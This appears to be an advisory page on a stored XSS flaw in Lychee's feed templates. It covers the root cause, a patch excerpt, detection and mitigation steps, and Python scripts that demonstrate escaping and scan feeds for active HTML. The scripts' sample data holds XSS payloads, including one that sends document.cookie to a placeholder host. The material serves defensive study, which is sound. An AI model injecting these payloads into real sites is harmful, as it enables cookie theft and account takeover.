CVE-2026-33738 Overview
CVE-2026-33738 is a stored Cross-Site Scripting (XSS) vulnerability in Lychee, a free, open-source photo-management tool. The photo description field is stored without HTML sanitization and rendered with Blade's unescaped output syntax ({!! $item->summary !!}) in the RSS, Atom, and JSON feed templates. Because the /feed endpoint is reachable without authentication, any feed consumer that renders item descriptions as HTML without sanitizing them (a browser-based reader, an aggregator's preview pane, or a site that embeds the feed) will execute the attacker's JavaScript.
Critical Impact
An authenticated user can place JavaScript in a photo description; it is served unchanged through the public /feed endpoint and executes in whatever feed reader or aggregator renders the description as HTML, with no authentication required on the consuming side.
Affected Products
- Lychee versions prior to 7.5.3
Discovery Timeline
- 2026-03-26 - CVE-2026-33738 published to NVD
- 2026-03-26 - Last updated in NVD database
Technical Details for CVE-2026-33738
Vulnerability Analysis
This vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), commonly known as Cross-Site Scripting. The flaw stems from improper output encoding in Lychee's feed generation functionality. When photo descriptions containing malicious scripts are processed, the application uses Blade's unescaped output syntax to render the content directly into RSS, Atom, and JSON feeds without sanitization.
The attack requires low privileges (authenticated user access to upload photos with descriptions) but can impact a broader audience since the /feed endpoint is publicly accessible. This creates a scenario where an authenticated attacker can persist malicious JavaScript that executes when any unauthenticated user or RSS aggregator accesses the feed.
Root Cause
The root cause is the use of Blade's unescaped directive {!! !!} rather than the escaping {{ }} syntax when emitting user-controlled content in the feed templates. The $item->summary value, which carries the photo description, is written out with no HTML entity encoding or sanitization, so raw HTML and JavaScript land verbatim in the feed. One caveat a practitioner should keep in mind: feed readers conventionally treat an RSS description or Atom summary as HTML, so an escape that only keeps the feed's XML well formed still delivers the original markup to the reader once its XML parser decodes the entities. What has to reach the consumer is text with no executable HTML, which is consistent with the upstream fix rendering the description through a Markdown converter instead of merely switching delimiters.
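The layering point above, as an added example that is not Lychee's code: a Python script that renders one constructed description payload three ways (verbatim inside CDATA as an unescaped template does, XML-escaped only, and HTML-escaped before XML-escaping), then parses each item the way a feed reader would and shows what string reaches the reader's HTML renderer. The template strings, the payload, and the contains_active_html heuristic are assumptions made for the demo, not Lychee's templates.

```python
"""Added example (not Lychee's code): three ways of emitting a photo
description into an RSS <item>, and what a feed reader receives from each
after XML parsing. Templates and payload are constructed for the demo."""
import html
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape as xml_escape

# Constructed attacker-controlled description; not from any real incident.
PAYLOAD = '<img src=x onerror="alert(document.domain)">Sunset over the bay'


def render_unescaped(summary: str) -> str:
    """The vulnerable pattern: the description is dropped in verbatim (here
    inside CDATA, as feed templates commonly do), so the raw HTML reaches
    whatever parses the feed."""
    return f"<item><description><![CDATA[{summary}]]></description></item>"


def render_xml_escaped(summary: str) -> str:
    """Escaped for XML only, the effect of switching {!! !!} to {{ }} on a
    value that is not wrapped in CDATA. The raw feed looks clean, but the
    consumer's XML parser decodes the entities back into the original HTML."""
    return f"<item><description>{xml_escape(summary)}</description></item>"


def render_html_safe(summary: str) -> str:
    """Hardened: HTML-escape the text first so that a reader rendering the
    description as HTML shows the tags literally, then XML-escape the result
    so the feed itself stays well formed."""
    safe_html = html.escape(summary, quote=True)
    return f"<item><description>{xml_escape(safe_html)}</description></item>"


def consumer_view(item_xml: str) -> str:
    """What a feed reader obtains for <description> after XML parsing. Readers
    conventionally hand this string to an HTML renderer."""
    return ET.fromstring(item_xml).findtext("description") or ""


def contains_active_html(fragment: str) -> bool:
    """Deliberately crude check for the demo (an assumption, not a sanitizer):
    does the decoded description still contain a tag with an event handler?"""
    return "<" in fragment and "onerror=" in fragment.lower()


if __name__ == "__main__":
    for name, render in (("unescaped", render_unescaped),
                         ("xml-escaped", render_xml_escaped),
                         ("html-then-xml-escaped", render_html_safe)):
        seen = consumer_view(render(PAYLOAD))
        print(f"{name:22s} reader gets: {seen!r}")
        print(f"{'':22s} active HTML: {contains_active_html(seen)}")
```

Running it shows that the first two variants hand the reader the identical img tag with its onerror handler, while only the third leaves the reader a string with no angle brackets to render.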
Attack Vector
An attacker with an authenticated Lychee account can upload a photo with a JavaScript payload embedded in the description field. When that content is rendered in the public RSS, Atom, or JSON feeds, the script executes in the context of any application that renders the feed content as HTML, such as RSS reader applications or aggregator services.
The attack vector is network-based: injecting the payload requires an authenticated account, but triggering it requires nothing more than fetching the public feed.
// Security patch - Adding Markdown facade for proper output sanitization
// Source: https://github.com/LycheeOrg/Lychee/commit/d2e2606a0223d5a384d5b806db1b31eb587adc5c
use App\Services\UrlGenerator;
use Carbon\Exceptions\InvalidFormatException;
use Carbon\Exceptions\UnitException;
+use GrahamCampbell\Markdown\Facades\Markdown;
use Illuminate\Contracts\Container\BindingResolutionException;
use Illuminate\Support\Carbon;
use Illuminate\Support\Collection;
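Review bot: this hunk only adds the Markdown facade import; the call site that replaces {!! $item->summary !!} is not in the excerpt, so it cannot be checked here that all three feed templates (RSS, Atom, JSON) actually route the description through the converter. The import by itself also does not establish that raw HTML is neutralized: a Markdown converter passes inline HTML and script-scheme links through unless it is configured to strip or escape HTML input and to reject unsafe links, so the commit should include or reference that configuration alongside this import.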
The excerpt shows only the import of the GrahamCampbell Markdown facade; per the advisory, the fix renders user-controlled content through it before output in the feed templates instead of emitting the raw value. Note that a Markdown converter neutralizes embedded HTML only when it is configured to strip or escape raw HTML input and to reject unsafe link schemes (in the Laravel-Markdown package these are the html_input and allow_unsafe_links settings); when reviewing the full commit, confirm those settings rather than relying on the import alone.
Detection Methods for CVE-2026-33738
Indicators of Compromise
- Photo descriptions containing <script> tags, HTML event-handler attributes (onerror, onload, and similar), or javascript: URLs in href or src attributes
- JavaScript or other active HTML in RSS/Atom/JSON output from the /feed endpoint (decode the XML first: an entity-encoded description is still HTML to the reader)
- Web server or application logs showing such payloads in requests that create or update photo descriptions
Detection Strategies
- Monitor application logs for photo descriptions containing <script>, javascript:, or HTML event-handler attributes
- Deploy Web Application Firewall (WAF) rules for XSS payloads on the requests that create or update photo descriptions, inspecting whatever request body format the Lychee client sends rather than only classic form fields
- Review feed output for active content (scripts, event handlers, script-scheme URLs); simple formatting tags may be legitimate in descriptions, so flag executable markup rather than any HTML at all
Monitoring Recommendations
- Enable logging for all photo description updates and monitor for HTML/JavaScript content
- Configure alerts for feed requests that result in responses containing suspicious script patterns
- Audit existing photo descriptions in the database for potential pre-existing malicious content
How to Mitigate CVE-2026-33738
Immediate Actions Required
- Upgrade Lychee to version 7.5.3 or later immediately
- Review existing photo descriptions in the database for malicious script content and sanitize as needed
- If immediate upgrade is not possible, consider temporarily disabling the /feed endpoint
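The feed review described under Detection Strategies and the audit of existing descriptions listed above, as one added example that is not Lychee's code: a Python script that parses a constructed RSS feed, decodes each item's description the way a reader would, and flags active HTML (script-like elements, on* event-handler attributes, javascript:/data:/vbscript: URLs) with the standard library's HTMLParser, so that attribute case, unquoted values and entity encoding do not defeat it the way a naive substring match could. The same detector is then applied to a constructed list of (photo id, description) rows standing in for the photos table. The sample feed, the sample rows and the ActiveHtmlDetector class are assumptions made for the demo.

```python
"""Added example (not Lychee's code): flag feed items and stored photo
descriptions that carry active HTML. Sample feed and rows are constructed."""
import re
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Constructed RSS feed with one benign item (simple formatting) and three
# items carrying the indicator classes the advisory lists.
SAMPLE_FEED = """<rss version="2.0"><channel><title>Constructed sample feed</title>
<item><title>Harbour</title><description><![CDATA[<b>Evening</b> light on the harbour]]></description></item>
<item><title>Sunset</title><description><![CDATA[<img src=x onerror="fetch('https://example.invalid/?c='+document.cookie)">Sunset]]></description></item>
<item><title>Alps</title><description>&lt;script&gt;alert(1)&lt;/script&gt;</description></item>
<item><title>Lake</title><description><![CDATA[<a href="JavaScript:alert(1)">view</a>]]></description></item>
</channel></rss>"""

# Constructed stand-in for rows of the photos table: (id, description).
SAMPLE_ROWS = [
    (101, "Harbour at dusk"),
    (102, "<i>Sunset</i> from the pier"),
    (103, "<svg onload=alert(document.domain)>"),
    (104, None),
]


class ActiveHtmlDetector(HTMLParser):
    """Collects reasons a fragment is suspicious: script-like elements,
    on* event-handler attributes, and script-scheme URLs in URL attributes."""
    ACTIVE_TAGS = {"script", "iframe", "object", "embed"}
    URL_ATTRS = {"href", "src", "xlink:href", "action", "formaction"}

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.reasons: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in self.ACTIVE_TAGS:
            self.reasons.append(f"<{tag}> element")
        for name, value in attrs:
            lname = name.lower()
            if lname.startswith("on"):
                self.reasons.append(f"{lname} handler on <{tag}>")
            elif lname in self.URL_ATTRS and value:
                # Browsers ignore ASCII whitespace and control characters
                # inside the scheme, so strip them before comparing.
                scheme = re.sub(r"[\x00-\x20]", "", value).lower()
                if scheme.startswith(("javascript:", "data:", "vbscript:")):
                    self.reasons.append(f"{lname}={value.strip()[:40]!r} on <{tag}>")


def suspicious_reasons(fragment: str) -> list[str]:
    """Run the detector over one HTML fragment and return what it found."""
    detector = ActiveHtmlDetector()
    detector.feed(fragment)
    detector.close()
    return detector.reasons


def _local(tag: str) -> str:
    """Strip an XML namespace prefix ({ns}name -> name)."""
    return tag.rsplit("}", 1)[-1]


def scan_feed(feed_xml: str) -> list[tuple[str, list[str]]]:
    """Return (title, reasons) for every RSS <item> or Atom <entry> whose
    description/summary/content carries active HTML. CDATA and entity-encoded
    descriptions both come out of the XML parser as the HTML the reader sees."""
    findings = []
    for node in ET.fromstring(feed_xml).iter():
        if _local(node.tag) not in ("item", "entry"):
            continue
        title = next((c.text or "" for c in node if _local(c.tag) == "title"), "")
        for child in node:
            if _local(child.tag) in ("description", "summary", "content"):
                reasons = suspicious_reasons(child.text or "")
                if reasons:
                    findings.append((title, reasons))
    return findings


def audit_descriptions(rows) -> list[tuple[int, list[str]]]:
    """Return (photo id, reasons) for stored descriptions that need review."""
    hits = []
    for photo_id, description in rows:
        reasons = suspicious_reasons(description or "")
        if reasons:
            hits.append((photo_id, reasons))
    return hits


if __name__ == "__main__":
    for title, reasons in scan_feed(SAMPLE_FEED):
        print(f"feed item {title!r}: {'; '.join(reasons)}")
    for photo_id, reasons in audit_descriptions(SAMPLE_ROWS):
        print(f"photo {photo_id}: {'; '.join(reasons)}")
```

For a live check, replace SAMPLE_FEED with the body fetched from the instance's /feed endpoint and SAMPLE_ROWS with the id and description columns selected from the photos table; the benign formatting in the first item and row 102 is intentionally not flagged, so the output is a review list, not a verdict.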
Patch Information
The vulnerability is addressed in Lychee version 7.5.3. The fix routes user-controlled content through the GrahamCampbell Markdown facade before it is rendered in the feed templates, instead of emitting the raw description. For details, see the GitHub Security Advisory GHSA-5574, the fix commit, and the v7.5.3 release notes.
Workarounds
- Disable or restrict access to the /feed endpoint at the web server level until the patch can be applied
- Validate photo descriptions on write to strip HTML and JavaScript; this protects new entries only, so pair it with an audit of existing descriptions
- Filtering feed responses with a reverse proxy or WAF is a last resort: rewriting response bodies is brittle against encoding variations, so prefer blocking the endpoint outright
# Example: block the /feed endpoint in nginx until the patch is applied.
# A regex location matches /feed and its sub-paths but not unrelated prefixes
# such as /feedback, and it takes precedence over ordinary prefix locations
# that hand requests to PHP. "return 403" is sufficient on its own; adding
# "deny all" would be redundant.
location ~ ^/feed(/|$) {
    return 403;
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

